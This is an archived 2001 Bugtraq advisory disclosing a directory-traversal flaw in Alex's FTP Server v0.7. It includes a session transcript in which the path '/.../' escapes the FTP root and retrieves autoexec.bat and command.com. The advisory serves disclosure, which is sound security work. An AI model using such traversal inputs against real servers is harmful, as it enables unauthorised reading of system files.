[20510] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Vulnerabilities in Alex's FTP Server

daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Apr 30 03:14:35 2001

Content-type: multipart/mixed;
              boundary="Hushpart_boundary_UDCmBEpcdPdLWurohccaKVMWLNkIpzrR"
Mime-version: 1.0
Message-ID:  <200104281950.MAA08515@user7.hushmail.com>
Date:         Sat, 28 Apr 2001 15:52:34 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM

--Hushpart_boundary_UDCmBEpcdPdLWurohccaKVMWLNkIpzrR
Content-type: text/plain

----- Begin Hush Signed Message from joetesta@hushmail.com -----

Vulnerabilities in Alex's FTP Server



    Overview

Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net.
Vulnerabilities exist which allow a user to break out of the ftp root.



    Details

The following is an illustration of the problem.  An ftp root of
'c:\directory\directory' was used:


Connected to xxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connection for retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" is current directory
ftp> get command.com
200 Port command okay
150 Opening data connection for retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
ftp>




    Solution

No quick fix is possible.



    Vendor Status

Alex Linde was contacted via <alex.linde@magic4.com> on
Friday, April 20, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
EQcZaZRY8qHbXEoNyX08XELi9dxKdjm2FqldEP7+Sl5CfDejO0PaPKe/uBYxHXEnkM2u
44EjodbwrUqAF7M64TA8mDMqpuUwx2NnDlCkvbLMMe5pbVUER/tFD2R4WdD/94j/vtU6
vLq31tg7Z3jKDgOasR3q9RUb9zsLWjN01FGjSwBQIy2pP+jBaK6Edt7O5oSU1OisSAbH
9IJF/nx9PovvNSqUqsmz/nbywYuN/CZTURgRfw584aKpidxKB+zrWrmq+wf/WzXxAooI
W3J7tpHQV2+Osu/f+w5HkS2yc2XWo6gcdAjOySGiA71OL18BLEF6avPFnKfUpFsE4NQ9
vVuYaI86jMyPlnJd2Rg9HYxxnU80Uu3s8ZLAIwLflbRqyDHk9P4Ivus5hQd0EDs5cjyE
ALYP9twX/Q86/5fz7qXFR/pJv6kmFr0eOKZdv1zOFES6eVYfdyJeLjhqbTa32BI/88l4
ywYMSBgRmg7W3eWWcs+FnGbzmMNX7sPUv9m5vIZjPtf/
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_UDCmBEpcdPdLWurohccaKVMWLNkIpzrR--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post